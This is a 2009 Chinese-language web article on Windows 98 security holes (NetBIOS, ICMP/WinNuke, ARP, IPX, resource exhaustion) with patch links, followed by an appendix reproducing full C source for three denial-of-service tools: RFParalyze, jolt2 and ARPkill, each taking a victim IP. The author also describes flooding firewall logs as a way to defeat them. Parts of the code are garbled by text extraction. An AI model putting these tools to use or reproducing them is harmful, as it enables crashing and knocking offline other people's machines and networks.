Win98常见安全漏洞与解决方案

时间:2009-03-10 00:08:51  来源:第二电脑网  作者:第二电脑网

  第二电脑网导读:保存的共享口令的第一个字节进行明文比较,如果匹配就认为通过了验证。 2、ICMP攻击     补丁:http://support.microsoft.com/support/kb/articles/Q154/1/74.asp     关于ICMP攻击的有很多了,WINNUKE、SPING和TEARDROP,比如WINNUKE,可对使用Windows 3.11/95/NT操作系统的上...
  正文:

1、共享密码校验漏洞

   老漏洞了,微软NETBIOS/ target=_blank class=infotextkey>BIOS协议的口令校验服务端在对客户端的口令进行校验时是以客户端发送的长度数据为依据。如果客户端设置数据包中密码长度域为1, 并发送一个字节的明文口令给服务端。服务端就会将客户端发来口令与服务端保存的共享口令的第一个字节进行明文比较,如果匹配就认为通过了验证。

2、ICMP攻击

    补丁:http://support.microsoft.com/support/kb/articles/Q154/1/74.asp

    关于ICMP攻击的有很多了,WINNUKE、SPING和TEARDROP,比如WINNUKE,可对使用Windows 3.11/95/NT操作系统的上网者进行攻击。它可向某一IP地址发送“OOB”(OUT OF BAND)数据,并攻击139端口(NETBIOS),如果攻击者进行端口监听的话,还可攻击其它端口。当被攻击的电脑收到“OOB"数据后,即无法对数据进行处理,并出现Internet连接中断或蓝屏幕死机等现象。

    ICMP通常报告在处理数据报过程中的错误,在以下几种情况下发送:当数据报不能到达目的地时,当网关已经失去缓存功能,当网关能够引导主机在更短路由上发送。一般上网用户可能不用到多少,不知道我理解得对不对,因此可以关闭ICMP。

    而且shotgun早提出关于ICMP木马的设计思路,台湾的**实现了(具体的程序我忘记了),这种木马可能对于只分析端口的防火墙防范木马简直是绝杀。


3、ARP 拒绝服务攻击

    影响WINDOWS98系统,当向运行Windows的主机发送大量无关的ARP数据包时,会导致系统耗尽所有的CPU内存资源而停止响应。如果向广播地址发送ARP请求时,可能导致整个居域网停止响应。

    攻击程序见:arpkill


4、IPX Ping 包拒绝服务漏洞

由于不正确的通过端口0x456发送一些不规范的IPX/SPX Ping包可能导致服务器出现拒绝服务攻击。IPX/SPX协议在Windows 98默认安装情况下是没有安装的,而在Windows 95默认安装时如果系统检测到网卡后此协议将自动安装。如果IPX/SPX协议被禁止,Windows 9x 将接受特殊的畸形IPX Ping 包,而且发送源地址已被修改为广播地址,并且将导致广播紊乱,促使带宽饱和,出现拒绝服务。如果源地址已被修改为广播地址,这样此网段中的每个机器都将响应此Ping请求,如此多的响应将导致网络瘫痪。


5、NetBIOS 缓存漏洞

(抄来一大段,我还不了解这个漏洞)在Windows 95, 98, NT 4.0, and 2000中的NetBIOS高速缓存执行允许远程插入动态缓存条目,而且可以移走动态和静态缓存条目。这是由NetBIOS缓存的实现和 CIFS(Common Internet File System)浏览协议之间的交互引起的。CIFS浏览协议用来生成网络资源的列表,该协议被用在“网上邻居”和“我的网络”等服务中。它还定义了一些浏览帧,这些帧被封装在NetBIOS数据包中。当从138号UDP端口接收到一个浏览帧的请求时,NetBIOS数据包中的信息被提取出来并添加到 NetBIOS缓存中。这些信息包括源和目的地的NetBIOS名字、第二源IP地址以及IP头。远程的恶意用户可以通过发送单播或广播类型的UDP数据包,从而使得NetBIOS名字到IP地址的解析进行重定向,在其控制之下转发到任意的IP地址。一旦NetBIOS缓存被UDP数据包破坏,就不再需要预测事务标识(据报道,事务标识是一个很容易预测的16 bit的标识)。为了刷新缓存中的动态条目,用户可以发送一个正向名字查询(Positive Name Query)响应,在该响应中提供另一个IP地址给NetBIOS名字映射。

    安全建议:WINDOWS的NETBIOS有很多缺陷,建议对NETBIOS进行安全配置。


6、NetBIOS 空源主机名导致系统崩溃

    当Windows 95/98收到一个NetBIOS会话的包,这个包中源主机名被设置成NULL,那么将导致发生不可预料的错误:系统崩溃,蓝屏,重起动,死锁或者丢失网络连接等等。

    攻击程序见:netbios空原主机名.txt


7、无效驱动器类型拒绝服务漏洞

    如果一个MicrosoftWindows9X客户端连接到一个文件/打印共享服务器时,服务器返回一个错误驱动器类型,那么将导致客户端崩溃,必须重新启动来恢复正常正常功能。下列驱动器类型是Windows9X能识别的:

1)驱动器号:

2)LPTx:

3)COMMx

4)IPC

返回给客户端的所有其他的驱动器类型会引起拒绝服务。

8、NetBIOS over TCP/IP 耗尽资源漏洞

    微软的执行NetBIOS可能由于一个远程开发漏洞而导致拒绝服务攻击。攻击者能够通过连接NBT端口而促使系统耗尽网络资源并停止工作。

攻击可通过如下方式来进行:初始化许多连接,然后关闭它们,让目标机器上的TCP管套(socket)处于FINWAIT_1状态。尽管这些管套最终将超时并被释放,但攻击者可以持续地发送更多请求,初始化并关闭新的连接,耗尽任何空闲的网络资源。结果将导致NetBIOS拒绝正常的服务,直到攻击停止。微软在NT 4.0 sp6中发布了一个补丁来修补该漏洞。

  简单说来,DDOS攻击基本是无法解决的,我特别喜欢,从SYN FLOOD理论上来说只要是有限带宽的服务都会被攻击到拒绝服务,服务器可能只是拒绝服务,而一般的PC可能就是系统资源耗尽了。而且,大量的DOS攻击可以造成防火墙大量日志,甚至日志满或者日志爆满掉。天网据说是6万记录即满,而6万日志,可以很快就搞定,只要知道天网过滤哪些东西就攻击哪些东西。呵呵,这就是强行突破FIREWALL或者IDS的前奏。

解决方法: 微软已经针对此漏洞开发了补丁程序,下载地址:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25114


其他漏洞:


Microsoft Windows Media Player .WMZ 任意 Java Applet 漏洞

测试方法: http://www.guninski.com/wmp7-3.html '中有详细描述


  以上内容只是一点简介,限于自己的水平,难免有错,欢迎大家指正。联系:refdom@263.net


--------------------------------------------------------------------
附:一些测试程序
--------------------------------------------------------------------

************************************************************
netbios空原主机名.txt
************************************************************

#include <stdio.h>    /* It's such a shame to waste  */
#include <stdlib.h>    /* this usable space. Instead, */
#include <string.h>    /* we'll just make it more   */
#include <netdb.h>    /* prophotoshop/ target=_blank class=infotextkey>ps to the men and women  */
#include <sys/socket.h>    /* (hi Tabi!) of #!adm and   */
#include <sys/types.h>    /* #!w00w00, because they rock */
#include <netinet/in.h>    /* so much. And we can't forget*/
#include <unistd.h>    /* our friends at eEye or    */
#include <string.h>    /* Attrition. Oh, +hi Sioda. */

/*   Magic winpopup message
  This is from Beavbeavis and says "yeh yeh"
  Ron and Marty should like the hardcoded values this has ;) 
*/
char blowup[]= "x00x00x00x41xffx53x4dx42xd0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x19x00x04x42x45x41x56x00x04x42x45x41x56x49"
"x53x00x01x08x00x79x65x70x20x79x65x70x00x00";

struct sreq /* little structure of netbios session request */
    {
    char first[5]; 
    char yoname[32];
    char sep[2];
    char myname[32];
    char end[1];
    };

void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/

int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;

printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/n");

if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>n");
printf("    --IP must be ip address, not dnsn");
printf("    --NetBIOS name must be in UPPER CASEnn");
exit(1);}

printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!n");

Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A';        /* how was Beltaine? :)    */
myname[31]='D';

Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s n",argv[1],argv[2]);

sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family   = AF_INET;
sin.sin_port    = htons(139);

sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
  perror("Problems connecting: ");
  exit(1);}

memset(buf,0,4000);

memcpy(smbreq.first,"x81x00x00x44x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"x00x20",2);        /*no need to worry about*/
memcpy(smbreq.end,"x00",1);          /*what it does :)    */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);

write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000);  /* get their response  */

if(x<1){ printf("Problem, didn't get responsen");
    exit(1);}

if(buf[0]=='x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.n");
    exit(1);}

write(sox,&blowup,72); /* send the magic message >:)   */
x=read(sox,buf,4000);  /* we really don't care, but sure */
close(sox);
printf("donen");
}

void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
 int i, len;
 len = strlen(name1);
 for (i = 0; i < 16; i++) {
  if (i >= len) {
   c1 = 'C'; c2 = 'A'; /* CA is a space */
  } else {
   c = name1;
   c1 = (char)((int)c/16 + (int)'A');
   c2 = (char)((int)c%16 + (int)'A');
  }
  name2[i*2] = c1;
  name2[i*2+1] = c2;
 }
 name2[32] = 0;  /* Put in the null ...*/
}


************************************************************
Windows Dos代码
************************************************************


  文件: jolt2.c

   描述: 这是Windows-of-serice攻击源代码,由Razor team编写。这段程序能导致cpu使用达到100%,最后系统瘫痪。

  测试平台: Windows 98
  Windows NT/SP5,6
  Windows 2000

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>

struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
} pkt;

int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;

void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addrn",
pname);
fprintf (stderr, "Note: UDP used if a port is specified, otherwise ICMPn");
exit(0);
}

u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;

res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}

void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}

int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x;
struct sockaddr_in to;

to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;

if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);

pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);

if (port)
{
pkt.proto.udp.source = htons(port|1235);
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a';
} else {
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0;
}

while (1) {
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
}
return bs;
}

int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];

if (argc < 2)
usage (argv[0]);

gethostname (hostname, 32);
src_addr = host_to_ip(hostname);

while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;

case 'p':
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;

case 'h':
default:
usage (argv[0]);
}
}

dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");

spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");

do_frags (spf_sck, src_addr, dst_addr, port);

************************************************************
ARPkill 代码
************************************************************

extern "C" {
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pcap.h>
#include <libnet.h>
#include <sys/times.h>
}


#define TMPBUFLEN 256
#define IP_LEN 4
#define MAC_LEN 6

// packet burst
#define PSEQ 50

// packet preload
#define STARTSEQ 15000


const unsigned char ethernull[6] = {0,0,0,0,0,0};
const unsigned char etherbcast[6] = {255,255,255,255,255,255};
u_char* sniffdevice;

// prints MAC
void print_mac(unsigned char* mac)
{
  printf("nMAC: %x:%x:%x:%x:%x:%x ", (unsigned)mac[0], (unsigned)mac[1], (unsigned)mac[2], (unsigned)mac[3], (unsigned)mac[4], (unsigned)mac[5]);
}


// sprints MAC
char* sprint_mac(unsigned char* mac)
{
static char tmpbuf[TMPBUFLEN];

  sprintf(tmpbuf, "%x:%x:%x:%x:%x:%x", (unsigned)mac[0], (unsigned)mac[1], (unsigned)mac[2], (unsigned)mac[3], (unsigned)mac[4], (unsigned)mac[5]);

return tmpbuf;
}


// prints IP
void print_ip(unsigned char* ip)
{
 printf("nIP: %u.%u.%u.%u ", (unsigned)ip[0], (unsigned)ip[1], (unsigned)ip[2], (unsigned)ip[3]);
}


// sprints IP
char* sprint_ip(unsigned char* ip)
{
static char tmpbuf[TMPBUFLEN];

 sprintf(tmpbuf, "%u.%u.%u.%u", (unsigned)ip[0], (unsigned)ip[1], (unsigned)ip[2], (unsigned)ip[3]);

return tmpbuf;
}


// reads MAC
void get_mac(u_char* mac, char* optarg)
{
 int i=0;
 char* ptr = strtok(optarg, ":-");
 while(ptr) {
  unsigned nmb;
  sscanf(ptr, "%x", &nmb);
  mac = (u_char)nmb;
  ptr = strtok(NULL, ":-");
  i++;
 }
}


// reads IP
void get_ip(u_char* ip, char* ipstr)
{
 int i=0;
 char* ptr = strtok(ipstr, ".");
 while(ptr && i<4) {
  ip = (unsigned char)atoi(ptr);
  ptr = strtok(NULL, ".");
  i++;
 }
}


main(int ac, char** av)
{

// usage
 if(ac<4)
  printf("nusage: %s <victim ip> <victim mac> <duration> [seq len]nn", av[0]), exit(1);

 srand(time(NULL));

 long long duration = atoi(av[3]);

 unsigned pseq = PSEQ;
 if(ac>4)
  pseq = atoi(av[4]);

 u_char victim_mac[MAC_LEN];
 get_mac(victim_mac, av[2]);

 u_char victim_ip[IP_LEN];
 get_ip(victim_ip, av[1]);

 u_char randmac[MAC_LEN];
 u_char randip[IP_LEN];
 bzero(randmac, sizeof(randmac));

 print_mac(victim_mac);
 print_ip(victim_ip);
 printf("npacket burst: %d", pseq);
 printf("nfreezing host for %d secondsn", (int)duration);

 struct timeval tv;
 gettimeofday(&tv, NULL);
 long long ts1 = tv.tv_sec;
 ts1 *= 1000000;
 ts1 += tv.tv_usec;

// init libnet
 struct sockaddr_in sin;
 u_char errbuf[TMPBUFLEN];
 if(libnet_select_device(&sin, (unsigned char **)&sniffdevice, (u_char*)errbuf) != 1) {
  printf("nERROR selecting device");
 }
 else {
  libnet_link_int* mylink;
  mylink = libnet_open_link_interface((char*)sniffdevice, (char*)errbuf);
  if(mylink == NULL) {
  printf("nERROR opening link interface: %s", errbuf);
  }
  else {
  long long ts2 = ts1;
  int i=0, j=0;

// send random arp packets
  for(i=0; i<sizeof(randmac); i++)
   randmac = rand() % 256;
  
  u_char buf[64];
  bzero(buf, sizeof(buf));

  while((ts2-ts1) < duration*1000000) {

   gettimeofday(&tv, NULL);
   ts2 = tv.tv_sec;
   ts2 *= 1000000;
   ts2 += tv.tv_usec;

   if(j > STARTSEQ && (j % pseq) == (pseq-1)) {
   usleep(1);
   }
   j++;

   for(i=0; i<sizeof(randip); i++)
   randip = rand() % 256;

   libnet_build_ethernet((u_char *)victim_mac, randmac, ETHERTYPE_ARP, NULL, 0, buf);
   libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY,
     randmac, randip, victim_mac, victim_ip, NULL, 0, buf+LIBNET_ETH_H);
   libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
  }

  long long mbytes = ((long long)j)*(LIBNET_ARP_H + LIBNET_ETH_H);
  double mb = mbytes;
  mb /= 1024.0;
  mb /= 1024.0;

  mbytes = ((long long)j-STARTSEQ)*(LIBNET_ARP_H + LIBNET_ETH_H);
  double mbr = mbytes;
  mbr /= 1024.0;
  mbr /= 1024.0;
  mbr /= duration;

  printf("npackets sentt%d [pkt]tsustained rate: %d [pkt/s]", j, (j-STARTSEQ)/duration);
  printf("nmbytes sentt%6.2lf [mb]tsustained rate: %4.2lf [mb/s]", mb, mbr);
  }
 }

 printf("nn");

return 0;
}

Win98常见安全漏洞与解决方案》由第二电脑网原创提供,转载请注明:http://www.002pc.com/pcedu/system/Win9x/9439.html


关键字:

关于《Win98常见安全漏洞与解决方案》文章的评论

站内搜索: 高级搜索

热门搜索: Windows style 系统 tr IP QQ CPU 安装 function 注册 if td